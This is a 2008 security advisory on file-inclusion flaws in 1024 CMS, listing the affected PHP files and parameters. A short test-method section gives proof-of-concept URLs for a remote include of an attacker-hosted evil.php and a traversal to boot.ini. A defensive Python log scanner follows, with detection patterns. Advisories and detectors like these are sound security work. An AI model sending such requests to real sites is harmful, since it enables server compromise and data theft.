Release date: 2008-07-04
Updated: 2008-07-08
Affected systems:
Treble Designs 1024 CMS 1.4.4 RFC
Treble Designs 1024 CMS 1.4.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30091
1024 is a content management system based on PHP and MySQL.
Multiple files in 1024 CMS contain vulnerabilities that a malicious user can exploit to disclose sensitive information or compromise a vulnerable system.
1) Input passed to the page_include parameter in themes/blog/layouts/standard.php, themes/default/layouts/standard.php, themes/portfolio/layouts/standard.php and themes/snazzy/layouts/standard.php is not properly validated before being used to include files. This can lead to the inclusion of arbitrary files from local or external resources. Successful exploitation requires that register_globals is enabled.
2) Input passed to various parameters in multiple files is not properly validated before being used to include files. This can lead to the inclusion of arbitrary files from local resources. Successful exploitation requires that magic_quotes_gpc is disabled. The affected parameters and files are listed below.
theme_dir and page parameters:
themes/blog/layouts/standard.php
themes/default/layouts/standard.php
themes/portfolio/layouts/standard.php
themes/snazzy/layouts/standard.php
themes/blog/layouts/total.php
themes/default/layouts/total.php
themes/portfolio/layouts/total.php
themes/snazzy/layouts/total.php
lang parameter:
admin/lang/fr/reports/default.php
lang/en/moderator/default.php
lang/fr/moderator/default.php
lang/de/moderator/default.php
admin_theme_dir parameter:
admin/ops/admins/default.php
admin/ops/reports/ops/download.php
admin/ops/reports/ops/forum.php
admin/ops/reports/ops/news.php
theme_dir parameter:
pages/download/default/ops/add.php
pages/download/default/ops/edit.php
pages/download/default/ops/newest.php
pages/download/default/ops/search.php
pages/download/default/ops/top.php
pages/forum/default/content.php
themes/blog/layouts/basic_footer.php
themes/default/layouts/basic_footer.php
themes/portfolio/layouts/basic_footer.php
themes/snazzy/layouts/basic_footer.php
themes/blog/layouts/basic_header.php
themes/default/layouts/basic_header.php
themes/portfolio/layouts/basic_header.php
themes/snazzy/layouts/basic_header.php
page, page_include and theme_dir parameters:
themes/blog/layouts/print.php
themes/default/layouts/print.php
themes/portfolio/layouts/print.php
themes/snazzy/layouts/print.php
<* Source: Digital Security
Link: http://marc.info/?l=bugtraq&m=121519055217560&w=2
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following procedure (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
http://www.example.com/[installdir]/themes/blog/layouts/standard.php?page_include=http://www.example.com/evil.php
http://www.example.com/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
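For defenders, the request shapes above can be searched for in web server access logs. The following is an added example, not part of the original advisory or of 1024 CMS: it assumes the common "combined" log format and a hypothetical install directory /cms, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the advisory lists as reaching an include unvalidated.
PARAMS = {"page_include", "theme_dir", "page", "lang", "admin_theme_dir"}
# Directories (relative to the install root) holding the listed scripts; matching
# by directory is deliberately broader than the advisory's exact file list.
AFFECTED = re.compile(
    r"/(?:themes/[^/]+/layouts|(?:admin/)?lang/[^/]+|admin/ops|pages/(?:download|forum))"
    r"/.*\.php$")
# Assumed "combined" access-log format: the request line is a quoted field.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def reasons(value):
    """Return why a decoded parameter value looks like an inclusion attempt."""
    found = []
    if re.match(r"(?i)[a-z][a-z0-9+.-]*://", value):
        found.append("remote-url")      # page_include pointing at an external resource
    if re.search(r"(^|[\\/])\.\.([\\/]|$)", value):
        found.append("traversal")       # ../ sequences leaving the theme directory
    if "\x00" in value:
        found.append("null-byte")       # %00 used to cut off an appended suffix
    return found

def scan(lines):
    """Yield (line_no, path, param, reasons) for suspicious requests."""
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not AFFECTED.search(url.path):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            why = reasons(value) if name in PARAMS else []
            if why:
                yield no, url.path, name, why

# Constructed sample log (documentation IP ranges; /cms is a hypothetical install dir).
SAMPLE = [
    '203.0.113.7 - - [05/Jul/2008:10:01:02 +0000] "GET /cms/themes/blog/layouts/standard.php?page_include=http://www.example.com/evil.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [05/Jul/2008:10:01:09 +0000] "GET /cms/themes/default/layouts/standard.php?theme_dir=../../../boot.ini%00 HTTP/1.1" 200 431',
    '198.51.100.4 - - [05/Jul/2008:10:02:00 +0000] "GET /cms/themes/default/layouts/print.php?page=news HTTP/1.1" 200 2048',
    '198.51.100.4 - - [05/Jul/2008:10:02:05 +0000] "GET /cms/index.php?page=forum HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

This only inspects the query string; with register_globals enabled the same variables can also arrive in POST bodies or cookies, which access logs normally do not record.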